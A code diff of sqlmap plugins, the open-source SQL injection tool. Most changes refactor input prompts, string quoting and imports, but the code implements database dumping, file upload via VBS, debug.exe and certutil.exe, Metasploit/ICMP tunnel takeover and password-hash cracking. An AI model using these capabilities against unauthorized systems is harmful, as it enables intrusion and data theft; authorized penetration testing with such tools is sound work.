from plugins.generic.enumeration import Enumeration as GenericEnumeration
class Enumeration(GenericEnumeration):
@@ -66,7 +65,7 @@ class Enumeration(GenericEnumeration):
conf.db = self.getCurrentDb()
if conf.db:
dbs = conf.db.split(",")
dbs = conf.db.split(',')
else:
dbs = self.getDbs()
@@ -117,7 +116,7 @@ class Enumeration(GenericEnumeration):
conf.db = safeSQLIdentificatorNaming(conf.db)
if conf.col:
colList = conf.col.split(",")
colList = conf.col.split(',')
else:
colList = []
@@ -128,7 +127,7 @@ class Enumeration(GenericEnumeration):
colList[colList.index(col)] = safeSQLIdentificatorNaming(col)
if conf.tbl:
tblList = conf.tbl.split(",")
tblList = conf.tbl.split(',')
else:
self.getTables()
@@ -173,11 +172,11 @@ class Enumeration(GenericEnumeration):
return kb.data.cachedColumns
message = "do you want to use common column existence check? [y/N/q] "
test = readInput(message, default="Y" if "Y" in message else "N")
choice = readInput(message, default='Y' if 'Y' in message else 'N').upper()
if test[0] in ("n", "N"):
if choice == 'N':
return
elif test[0] in ("q", "Q"):
elif choice == 'Q':
raise SqlmapUserQuitException
else:
return columnExists(paths.COMMON_COLUMNS)

15
plugins/dbms/mssqlserver/enumeration.py
View File

@@ -7,7 +7,6 @@ See the file 'doc/COPYING' for copying permission
from lib.core.agent import agent
from lib.core.common import arrayizeValue
from lib.core.common import Backend
from lib.core.common import getLimitRange
from lib.core.common import isInferenceAvailable
from lib.core.common import isNoneValue
@@ -76,7 +75,7 @@ class Enumeration(GenericEnumeration):
conf.db = self.getCurrentDb()
if conf.db:
dbs = conf.db.split(",")
dbs = conf.db.split(',')
else:
dbs = self.getDbs()
@@ -164,7 +163,7 @@ class Enumeration(GenericEnumeration):
def searchTable(self):
foundTbls = {}
tblList = conf.tbl.split(",")
tblList = conf.tbl.split(',')
rootQuery = queries[DBMS.MSSQL].search_table
tblCond = rootQuery.inband.condition
tblConsider, tblCondParam = self.likeOrExact("table")
@@ -173,7 +172,7 @@ class Enumeration(GenericEnumeration):
conf.db = self.getCurrentDb()
if conf.db:
enumDbs = conf.db.split(",")
enumDbs = conf.db.split(',')
elif not len(kb.data.cachedDbs):
enumDbs = self.getDbs()
else:
@@ -270,7 +269,7 @@ class Enumeration(GenericEnumeration):
whereTblsQuery = ""
infoMsgTbl = ""
infoMsgDb = ""
colList = conf.col.split(",")
colList = conf.col.split(',')
if conf.excludeCol:
colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')]
@@ -285,7 +284,7 @@ class Enumeration(GenericEnumeration):
conf.db = self.getCurrentDb()
if conf.db:
enumDbs = conf.db.split(",")
enumDbs = conf.db.split(',')
elif not len(kb.data.cachedDbs):
enumDbs = self.getDbs()
else:
@@ -308,7 +307,7 @@ class Enumeration(GenericEnumeration):
foundCols[column] = {}
if conf.tbl:
_ = conf.tbl.split(",")
_ = conf.tbl.split(',')
whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in _) + ")"
infoMsgTbl = " for table%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(tbl for tbl in _))
@@ -316,7 +315,7 @@ class Enumeration(GenericEnumeration):
conf.db = self.getCurrentDb()
if conf.db:
_ = conf.db.split(",")
_ = conf.db.split(',')
infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _))
elif conf.excludeSysDbs:
msg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList))

9
plugins/dbms/mssqlserver/filesystem.py
View File

@@ -382,27 +382,24 @@ class Filesystem(GenericFilesystem):
if written is False:
message = "do you want to try to upload the file with "
message += "the custom Visual Basic script technique? [Y/n] "
choice = readInput(message, default="Y")
if not choice or choice.lower() == "y":
if readInput(message, default='Y', boolean=True):
self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
if written is False:
message = "do you want to try to upload the file with "
message += "the built-in debug.exe technique? [Y/n] "
choice = readInput(message, default="Y")
if not choice or choice.lower() == "y":
if readInput(message, default='Y', boolean=True):
self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
if written is False:
message = "do you want to try to upload the file with "
message += "the built-in certutil.exe technique? [Y/n] "
choice = readInput(message, default="Y")
if not choice or choice.lower() == "y":
if readInput(message, default='Y', boolean=True):
self._stackedWriteFileCertutilExe(tmpPath, wFile, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)

2
plugins/dbms/mssqlserver/fingerprint.py
View File

@@ -82,7 +82,7 @@ class Fingerprint(GenericFingerprint):
if conf.direct:
result = True
else:
result = inject.checkBooleanExpression("SQUARE([RANDNUM])=SQUARE([RANDNUM])")
result = inject.checkBooleanExpression("UNICODE(SQUARE(NULL)) IS NULL")
if result:
infoMsg = "confirming %s" % DBMS.MSSQL

4
plugins/dbms/mysql/connector.py
View File

@@ -37,8 +37,10 @@ class Connector(GenericConnector):
try:
self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True)
except (pymysql.OperationalError, pymysql.InternalError, struct.error), msg:
except (pymysql.OperationalError, pymysql.InternalError), msg:
raise SqlmapConnectionException(msg[1])
except struct.error, msg:
raise SqlmapConnectionException(msg)
self.initCursor()
self.printConnected()

5
plugins/dbms/mysql/fingerprint.py
View File

@@ -20,7 +20,6 @@ from lib.core.enums import HASHDB_KEYS
from lib.core.enums import OS
from lib.core.session import setDbms
from lib.core.settings import MYSQL_ALIASES
from lib.core.settings import UNKNOWN_DBMS_VERSION
from lib.request import inject
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
@@ -95,13 +94,13 @@ class Fingerprint(GenericFingerprint):
value = ""
wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp and not hasattr(conf, "api"):
if wsOsFp and not conf.api:
value += "%s\n" % wsOsFp
if kb.data.banner:
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp and not hasattr(conf, "api"):
if dbmsOsFp and not conf.api:
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: "

7
plugins/dbms/oracle/enumeration.py
View File

@@ -5,7 +5,6 @@ Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.common import Backend
from lib.core.common import getLimitRange
from lib.core.common import isAdminFromPrivileges
from lib.core.common import isInferenceAvailable
@@ -51,7 +50,7 @@ class Enumeration(GenericEnumeration):
condition = rootQuery.inband.condition
if conf.user:
users = conf.user.split(",")
users = conf.user.split(',')
query += " WHERE "
query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users))
@@ -68,7 +67,7 @@ class Enumeration(GenericEnumeration):
user = None
roles = set()
for count in xrange(0, len(value)):
for count in xrange(0, len(value or [])):
# The first column is always the username
if count == 0:
user = value[count]
@@ -87,7 +86,7 @@ class Enumeration(GenericEnumeration):
if not kb.data.cachedUsersRoles and isInferenceAvailable() and not conf.direct:
if conf.user:
users = conf.user.split(",")
users = conf.user.split(',')
else:
if not len(kb.data.cachedUsers):
users = self.getUsers()

15
plugins/dbms/sybase/enumeration.py
View File

@@ -5,7 +5,6 @@ Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.common import Backend
from lib.core.common import filterPairValues
from lib.core.common import isTechniqueAvailable
from lib.core.common import randomStr
@@ -25,8 +24,8 @@ from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import CURRENT_DB
from lib.utils.brute import columnExists
from lib.utils.pivotdumptable import pivotDumpTable
from lib.techniques.brute.use import columnExists
from plugins.generic.enumeration import Enumeration as GenericEnumeration
class Enumeration(GenericEnumeration):
@@ -125,7 +124,7 @@ class Enumeration(GenericEnumeration):
conf.db = self.getCurrentDb()
if conf.db:
dbs = conf.db.split(",")
dbs = conf.db.split(',')
else:
dbs = self.getDbs()
@@ -185,7 +184,7 @@ class Enumeration(GenericEnumeration):
conf.db = safeSQLIdentificatorNaming(conf.db)
if conf.col:
colList = conf.col.split(",")
colList = conf.col.split(',')
else:
colList = []
@@ -196,7 +195,7 @@ class Enumeration(GenericEnumeration):
colList[colList.index(col)] = safeSQLIdentificatorNaming(col)
if conf.tbl:
tblList = conf.tbl.split(",")
tblList = conf.tbl.split(',')
else:
self.getTables()
@@ -241,11 +240,11 @@ class Enumeration(GenericEnumeration):
return kb.data.cachedColumns
message = "do you want to use common column existence check? [y/N/q] "
test = readInput(message, default="Y" if "Y" in message else "N")
choice = readInput(message, default='Y' if 'Y' in message else 'N').upper()
if test[0] in ("n", "N"):
if choice == 'N':
return
elif test[0] in ("q", "Q"):
elif choice == 'Q':
raise SqlmapUserQuitException
else:
return columnExists(paths.COMMON_COLUMNS)

5
plugins/generic/connector.py
View File

@@ -11,7 +11,6 @@ from lib.core.data import conf
from lib.core.data import logger
from lib.core.exception import SqlmapFilePathException
from lib.core.exception import SqlmapUndefinedMethod
from lib.core.settings import UNICODE_ENCODING
class Connector:
"""
@@ -23,8 +22,8 @@ class Connector:
self.cursor = None
def initConnection(self):
self.user = conf.dbmsUser.encode(UNICODE_ENCODING) if conf.dbmsUser is not None else ""
self.password = conf.dbmsPass.encode(UNICODE_ENCODING) if conf.dbmsPass is not None else ""
self.user = conf.dbmsUser or ""
self.password = conf.dbmsPass or ""
self.hostname = conf.hostname
self.port = conf.port
self.db = conf.dbmsDb

2
plugins/generic/custom.py
View File

@@ -51,7 +51,7 @@ class Custom:
return output
elif not isStackingAvailable() and not conf.direct:
warnMsg = "execution of custom SQL queries is only "
warnMsg = "execution of non-query SQL statements is only "
warnMsg += "available when stacked queries are supported"
logger.warn(warnMsg)

26
plugins/generic/databases.py
View File

@@ -42,9 +42,9 @@ from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import CURRENT_DB
from lib.request import inject
from lib.techniques.brute.use import columnExists
from lib.techniques.brute.use import tableExists
from lib.techniques.union.use import unionUse
from lib.utils.brute import columnExists
from lib.utils.brute import tableExists
class Databases:
"""
@@ -215,7 +215,7 @@ class Databases:
conf.db = conf.db.upper()
if conf.db:
dbs = conf.db.split(",")
dbs = conf.db.split(',')
else:
dbs = self.getDbs()
@@ -243,11 +243,11 @@ class Databases:
return kb.data.cachedTables
message = "do you want to use common table existence check? %s " % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]")
test = readInput(message, default="Y" if "Y" in message else "N")
choice = readInput(message, default='Y' if 'Y' in message else 'N').upper()
if test[0] in ("n", "N"):
if choice == 'N':
return
elif test[0] in ("q", "Q"):
elif choice == 'Q':
raise SqlmapUserQuitException
else:
return tableExists(paths.COMMON_TABLES)
@@ -269,9 +269,9 @@ class Databases:
if conf.excludeSysDbs:
infoMsg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList))
logger.info(infoMsg)
query += " IN (%s)" % ",".join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs) if db not in self.excludeDbsList)
query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs) if db not in self.excludeDbsList)
else:
query += " IN (%s)" % ",".join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs))
query += " IN (%s)" % ','.join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs))
if len(dbs) < 2 and ("%s," % condition) in query:
query = query.replace("%s," % condition, "", 1)
@@ -422,7 +422,7 @@ class Databases:
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB):
conf.tbl = conf.tbl.upper()
tblList = conf.tbl.split(",")
tblList = conf.tbl.split(',')
else:
self.getTables()
@@ -486,11 +486,11 @@ class Databases:
return kb.data.cachedColumns
message = "do you want to use common column existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]")
test = readInput(message, default="Y" if "Y" in message else "N")
choice = readInput(message, default='Y' if 'Y' in message else 'N').upper()
if test[0] in ("n", "N"):
if choice == 'N':
return
elif test[0] in ("q", "Q"):
elif choice == 'Q':
raise SqlmapUserQuitException
else:
return columnExists(paths.COMMON_COLUMNS)
@@ -883,7 +883,7 @@ class Databases:
self.forceDbmsEnum()
if conf.tbl:
for table in conf.tbl.split(","):
for table in conf.tbl.split(','):
self._tableGetCount(conf.db, table)
else:
self.getTables()

143
plugins/generic/entries.py
View File

@@ -79,7 +79,7 @@ class Entries:
if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB):
conf.tbl = conf.tbl.upper()
tblList = conf.tbl.split(",")
tblList = conf.tbl.split(',')
else:
self.getTables()
@@ -170,18 +170,44 @@ class Entries:
if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL):
table = "%s.%s" % (conf.db, tbl)
try:
retVal = pivotDumpTable(table, colList, blind=False)
except KeyboardInterrupt:
retVal = None
kb.dumpKeyboardInterrupt = True
clearConsoleLine()
warnMsg = "Ctrl+C detected in dumping phase"
logger.warn(warnMsg)
if Backend.isDbms(DBMS.MSSQL):
query = rootQuery.blind.count % table
query = agent.whereQuery(query)
if retVal:
entries, _ = retVal
entries = zip(*[entries[colName] for colName in colList])
count = inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if isNumPosStrValue(count):
try:
indexRange = getLimitRange(count, plusOne=True)
for index in indexRange:
row = []
for column in colList:
query = rootQuery.blind.query3 % (column, column, table, index)
query = agent.whereQuery(query)
value = inject.getValue(query, blind=False, time=False, dump=True) or ""
row.append(value)
entries.append(row)
except KeyboardInterrupt:
kb.dumpKeyboardInterrupt = True
clearConsoleLine()
warnMsg = "Ctrl+C detected in dumping phase"
logger.warn(warnMsg)
if not entries and not kb.dumpKeyboardInterrupt:
try:
retVal = pivotDumpTable(table, colList, blind=False)
except KeyboardInterrupt:
retVal = None
kb.dumpKeyboardInterrupt = True
clearConsoleLine()
warnMsg = "Ctrl+C detected in dumping phase"
logger.warn(warnMsg)
if retVal:
entries, _ = retVal
entries = zip(*[entries[colName] for colName in colList])
else:
query = rootQuery.inband.query % (colString, conf.db, tbl)
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB):
@@ -191,7 +217,7 @@ class Entries:
query = agent.whereQuery(query)
if not entries and query:
if not entries and query and not kb.dumpKeyboardInterrupt:
try:
entries = inject.getValue(query, blind=False, time=False, dump=True)
except KeyboardInterrupt:
@@ -285,17 +311,44 @@ class Entries:
elif Backend.isDbms(DBMS.MAXDB):
table = "%s.%s" % (conf.db, tbl)
try:
retVal = pivotDumpTable(table, colList, count, blind=True)
except KeyboardInterrupt:
retVal = None
kb.dumpKeyboardInterrupt = True
clearConsoleLine()
warnMsg = "Ctrl+C detected in dumping phase"
logger.warn(warnMsg)
if Backend.isDbms(DBMS.MSSQL):
try:
indexRange = getLimitRange(count, plusOne=True)
if retVal:
entries, lengths = retVal
for index in indexRange:
for column in colList:
query = rootQuery.blind.query3 % (column, column, table, index)
query = agent.whereQuery(query)
value = inject.getValue(query, union=False, error=False, dump=True) or ""
if column not in lengths:
lengths[column] = 0
if column not in entries:
entries[column] = BigArray()
lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value))))
entries[column].append(value)
except KeyboardInterrupt:
kb.dumpKeyboardInterrupt = True
clearConsoleLine()
warnMsg = "Ctrl+C detected in dumping phase"
logger.warn(warnMsg)
if not entries and not kb.dumpKeyboardInterrupt:
try:
retVal = pivotDumpTable(table, colList, count, blind=True)
except KeyboardInterrupt:
retVal = None
kb.dumpKeyboardInterrupt = True
clearConsoleLine()
warnMsg = "Ctrl+C detected in dumping phase"
logger.warn(warnMsg)
if retVal:
entries, lengths = retVal
else:
emptyColumns = []
@@ -422,9 +475,8 @@ class Entries:
def dumpFoundColumn(self, dbs, foundCols, colConsider):
message = "do you want to dump entries? [Y/n] "
output = readInput(message, default="Y")
if output and output[0] not in ("y", "Y"):
if not readInput(message, default='Y', boolean=True):
return
dumpFromDbs = []
@@ -435,14 +487,14 @@ class Entries:
message += "[%s]\n" % unsafeSQLIdentificatorNaming(db)
message += "[q]uit"
test = readInput(message, default="a")
choice = readInput(message, default='a')
if not test or test in ("a", "A"):
if not choice or choice in ('a', 'A'):
dumpFromDbs = dbs.keys()
elif test in ("q", "Q"):
elif choice in ('q', 'Q'):
return
else:
dumpFromDbs = test.replace(" ", "").split(",")
dumpFromDbs = choice.replace(" ", "").split(',')
for db, tblData in dbs.items():
if db not in dumpFromDbs or not tblData:
@@ -458,16 +510,16 @@ class Entries:
message += "[s]kip\n"
message += "[q]uit"
test = readInput(message, default="a")
choice = readInput(message, default='a')
if not test or test in ("a", "A"):
if not choice or choice in ('a', 'A'):
dumpFromTbls = tblData
elif test in ("s", "S"):
elif choice in ('s', 'S'):
continue
elif test in ("q", "Q"):
elif choice in ('q', 'Q'):
return
else:
dumpFromTbls = test.replace(" ", "").split(",")
dumpFromTbls = choice.replace(" ", "").split(',')
for table, columns in tblData.items():
if table not in dumpFromTbls:
@@ -479,7 +531,7 @@ class Entries:
if conf.excludeCol:
colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')]
conf.col = ",".join(colList)
conf.col = ','.join(colList)
kb.data.cachedColumns = {}
kb.data.dumpedTable = {}
@@ -490,9 +542,8 @@ class Entries:
def dumpFoundTables(self, tables):
message = "do you want to dump tables' entries? [Y/n] "
output = readInput(message, default="Y")
if output and output[0].lower() != "y":
if not readInput(message, default='Y', boolean=True):
return
dumpFromDbs = []
@@ -503,14 +554,14 @@ class Entries:
message += "[%s]\n" % unsafeSQLIdentificatorNaming(db)
message += "[q]uit"
test = readInput(message, default="a")
choice = readInput(message, default='a')
if not test or test.lower() == "a":
if not choice or choice.lower() == 'a':
dumpFromDbs = tables.keys()
elif test.lower() == "q":
elif choice.lower() == 'q':
return
else:
dumpFromDbs = test.replace(" ", "").split(",")
dumpFromDbs = choice.replace(" ", "").split(',')
for db, tablesList in tables.items():
if db not in dumpFromDbs or not tablesList:
@@ -526,16 +577,16 @@ class Entries:
message += "[s]kip\n"
message += "[q]uit"
test = readInput(message, default="a")
choice = readInput(message, default='a')
if not test or test.lower() == "a":
if not choice or choice.lower() == 'a':
dumpFromTbls = tablesList
elif test.lower() == "s":
elif choice.lower() == 's':
continue
elif test.lower() == "q":
elif choice.lower() == 'q':
return
else:
dumpFromTbls = test.replace(" ", "").split(",")
dumpFromTbls = choice.replace(" ", "").split(',')
for table in dumpFromTbls:
conf.tbl = table

11
plugins/generic/filesystem.py
View File

@@ -156,15 +156,15 @@ class Filesystem:
return retVal
def askCheckWrittenFile(self, localFile, remoteFile, forceCheck=False):
output = None
choice = None
if forceCheck is not True:
message = "do you want confirmation that the local file '%s' " % localFile
message += "has been successfully written on the back-end DBMS "
message += "file system ('%s')? [Y/n] " % remoteFile
output = readInput(message, default="Y")
choice = readInput(message, default='Y', boolean=True)
if forceCheck or (output and output.lower() == "y"):
if forceCheck or choice:
return self._checkFileLength(localFile, remoteFile)
return True
@@ -173,9 +173,8 @@ class Filesystem:
message = "do you want confirmation that the remote file '%s' " % remoteFile
message += "has been successfully downloaded from the back-end "
message += "DBMS file system? [Y/n] "
output = readInput(message, default="Y")
if not output or output in ("y", "Y"):
if readInput(message, default='Y', boolean=True):
return self._checkFileLength(localFile, remoteFile, True)
return None
@@ -205,7 +204,7 @@ class Filesystem:
self.checkDbmsOs()
for remoteFile in remoteFiles.split(","):
for remoteFile in remoteFiles.split(','):
fileContent = None
kb.fileReadMode = True

6
plugins/generic/fingerprint.py
View File

@@ -45,12 +45,12 @@ class Fingerprint:
msg = "do you want to provide the OS? [(W)indows/(l)inux]"
while True:
os = readInput(msg, default="W")
os = readInput(msg, default='W').upper()
if os[0].lower() == "w":
if os == 'W':
Backend.setOs(OS.WINDOWS)
break
elif os[0].lower() == "l":
elif os == 'L':
Backend.setOs(OS.LINUX)
break
else:

5
plugins/generic/misc.py
View File

@@ -101,7 +101,7 @@ class Miscellaneous:
query = "SELECT %s" % query
kb.bannerFp["dbmsVersion"] = unArrayizeValue(inject.getValue(query))
kb.bannerFp["dbmsVersion"] = (kb.bannerFp["dbmsVersion"] or "").replace(",", "").replace("-", "").replace(" ", "")
kb.bannerFp["dbmsVersion"] = (kb.bannerFp["dbmsVersion"] or "").replace(',', "").replace('-', "").replace(' ', "")
def delRemoteFile(self, filename):
if not filename:
@@ -169,9 +169,8 @@ class Miscellaneous:
for udf, inpRet in udfDict.items():
message = "do you want to remove UDF '%s'? [Y/n] " % udf
output = readInput(message, default="Y")
if not output or output in ("y", "Y"):
if readInput(message, default='Y', boolean=True):
dropStr = "DROP FUNCTION %s" % udf
if Backend.isDbms(DBMS.PGSQL):

45
plugins/generic/search.py
View File

@@ -33,8 +33,8 @@ from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import CURRENT_DB
from lib.core.settings import METADB_SUFFIX
from lib.request import inject
from lib.techniques.brute.use import columnExists
from lib.techniques.brute.use import tableExists
from lib.utils.brute import columnExists
from lib.utils.brute import tableExists
class Search:
"""
@@ -47,7 +47,7 @@ class Search:
def searchDb(self):
foundDbs = []
rootQuery = queries[Backend.getIdentifiedDbms()].search_db
dbList = conf.db.split(",")
dbList = conf.db.split(',')
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
dbCond = rootQuery.inband.condition2
@@ -146,18 +146,18 @@ class Search:
if bruteForce:
message = "do you want to use common table existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]")
test = readInput(message, default="Y" if "Y" in message else "N")
choice = readInput(message, default='Y' if 'Y' in message else 'N').upper()
if test[0] in ("n", "N"):
if choice == 'N':
return
elif test[0] in ("q", "Q"):
elif choice == 'Q':
raise SqlmapUserQuitException
else:
regex = "|".join(conf.tbl.split(","))
regex = '|'.join(conf.tbl.split(','))
return tableExists(paths.COMMON_TABLES, regex)
foundTbls = {}
tblList = conf.tbl.split(",")
tblList = conf.tbl.split(',')
rootQuery = queries[Backend.getIdentifiedDbms()].search_table
tblCond = rootQuery.inband.condition
dbCond = rootQuery.inband.condition2
@@ -171,7 +171,7 @@ class Search:
tbl = tbl.upper()
infoMsg = "searching table"
if tblConsider == "1":
if tblConsider == '1':
infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl)
@@ -179,7 +179,7 @@ class Search:
conf.db = self.getCurrentDb()
if dbCond and conf.db:
_ = conf.db.split(",")
_ = conf.db.split(',')
whereDbsQuery = " AND (" + " OR ".join("%s = '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in _) + ")"
infoMsg += " for database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _))
elif conf.excludeSysDbs:
@@ -264,7 +264,7 @@ class Search:
if tblConsider == "2":
continue
else:
for db in conf.db.split(",") if conf.db else (self.getCurrentDb(),):
for db in conf.db.split(',') if conf.db else (self.getCurrentDb(),):
db = safeSQLIdentificatorNaming(db)
if db not in foundTbls:
foundTbls[db] = []
@@ -345,20 +345,19 @@ class Search:
if bruteForce:
message = "do you want to use common column existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]")
test = readInput(message, default="Y" if "Y" in message else "N")
choice = readInput(message, default='Y' if 'Y' in message else 'N').upper()
if test[0] in ("n", "N"):
if choice == 'N':
return
elif test[0] in ("q", "Q"):
elif choice == 'Q':
raise SqlmapUserQuitException
else:
regex = '|'.join(conf.col.split(','))
conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS, regex))
message = "do you want to dump entries? [Y/n] "
output = readInput(message, default="Y")
if output and output[0] not in ("n", "N"):
if readInput(message, default='Y', boolean=True):
self.dumpAll()
return
@@ -370,7 +369,7 @@ class Search:
whereTblsQuery = ""
infoMsgTbl = ""
infoMsgDb = ""
colList = conf.col.split(",")
colList = conf.col.split(',')
if conf.excludeCol:
colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')]
@@ -399,7 +398,7 @@ class Search:
foundCols[column] = {}
if conf.tbl:
_ = conf.tbl.split(",")
_ = conf.tbl.split(',')
whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in _) + ")"
infoMsgTbl = " for table%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(tbl) for tbl in _))
@@ -407,7 +406,7 @@ class Search:
conf.db = self.getCurrentDb()
if conf.db:
_ = conf.db.split(",")
_ = conf.db.split(',')
whereDbsQuery = " AND (" + " OR ".join("%s = '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in _) + ")"
infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in _))
elif conf.excludeSysDbs:
@@ -434,13 +433,13 @@ class Search:
# column(s) provided
values = []
for db in conf.db.split(","):
for tbl in conf.tbl.split(","):
for db in conf.db.split(','):
for tbl in conf.tbl.split(','):
values.append([safeSQLIdentificatorNaming(db), safeSQLIdentificatorNaming(tbl, True)])
for db, tbl in filterPairValues(values):
db = safeSQLIdentificatorNaming(db)
tbls = tbl.split(",") if not isNoneValue(tbl) else []
tbls = tbl.split(',') if not isNoneValue(tbl) else []
for tbl in tbls:
tbl = safeSQLIdentificatorNaming(tbl, True)
@@ -507,7 +506,7 @@ class Search:
if db not in foundCols[column]:
foundCols[column][db] = []
else:
for db in conf.db.split(",") if conf.db else (self.getCurrentDb(),):
for db in conf.db.split(',') if conf.db else (self.getCurrentDb(),):
db = safeSQLIdentificatorNaming(db)
if db not in foundCols[column]:
foundCols[column][db] = []

2
plugins/generic/syntax.py
View File

@@ -22,7 +22,7 @@ class Syntax:
retVal = expression
if quote:
for item in re.findall(r"'[^']*'+", expression, re.S):
for item in re.findall(r"'[^']*'+", expression):
_ = item[1:-1]
if _:
retVal = retVal.replace(item, escaper(_))

27
plugins/generic/takeover.py
View File

@@ -96,20 +96,16 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
msg = "how do you want to establish the tunnel?"
msg += "\n[1] TCP: Metasploit Framework (default)"
msg += "\n[2] ICMP: icmpsh - ICMP tunneling"
valids = (1, 2)
while True:
tunnel = readInput(msg, default=1)
tunnel = readInput(msg, default='1')
if isinstance(tunnel, basestring) and tunnel.isdigit() and int(tunnel) in valids:
if tunnel.isdigit() and int(tunnel) in (1, 2):
tunnel = int(tunnel)
break
elif isinstance(tunnel, int) and tunnel in valids:
break
else:
warnMsg = "invalid value, valid values are 1 and 2"
warnMsg = "invalid value, valid values are '1' and '2'"
logger.warn(warnMsg)
else:
tunnel = 1
@@ -170,17 +166,14 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
msg += "\n[2] Via shellcodeexec (file system way, preferred on 64-bit systems)"
while True:
choice = readInput(msg, default=1)
choice = readInput(msg, default='1')
if isinstance(choice, basestring) and choice.isdigit() and int(choice) in (1, 2):
if choice.isdigit() and int(choice) in (1, 2):
choice = int(choice)
break
elif isinstance(choice, int) and choice in (1, 2):
break
else:
warnMsg = "invalid value, valid values are 1 and 2"
warnMsg = "invalid value, valid values are '1' and '2'"
logger.warn(warnMsg)
if choice == 1:
@@ -336,11 +329,8 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
msg = "this technique is likely to DoS the DBMS process, are you "
msg += "sure that you want to carry with the exploit? [y/N] "
choice = readInput(msg, default="N")
dos = choice and choice[0].lower() == "y"
if dos:
if readInput(msg, default='N', boolean=True):
self.initEnv(mandatory=False, detailed=True)
self.getRemoteTempPath()
self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True)
@@ -460,9 +450,8 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
message = "are you sure that you want to delete the Windows "
message += "registry path '%s\%s? [y/N] " % (regKey, regVal)
output = readInput(message, default="N")
if output and output[0] not in ("Y", "y"):
if not readInput(message, default='N', boolean=True):
return
infoMsg = "deleting Windows registry path '%s\%s'. " % (regKey, regVal)

31
plugins/generic/users.py
View File

@@ -161,7 +161,7 @@ class Users:
conf.user = conf.user.upper()
if conf.user:
users = conf.user.split(",")
users = conf.user.split(',')
if Backend.isDbms(DBMS.MYSQL):
for user in users:
@@ -319,11 +319,11 @@ class Users:
message = "do you want to perform a dictionary-based attack "
message += "against retrieved password hashes? [Y/n/q]"
test = readInput(message, default="Y")
choice = readInput(message, default='Y').upper()
if test[0] in ("n", "N"):
if choice == 'N':
pass
elif test[0] in ("q", "Q"):
elif choice == 'Q':
raise SqlmapUserQuitException
else:
attackCachedUsersPasswords()
@@ -345,7 +345,7 @@ class Users:
conf.user = conf.user.upper()
if conf.user:
users = conf.user.split(",")
users = conf.user.split(',')
if Backend.isDbms(DBMS.MYSQL):
for user in users:
@@ -393,7 +393,7 @@ class Users:
user = None
privileges = set()
for count in xrange(0, len(value)):
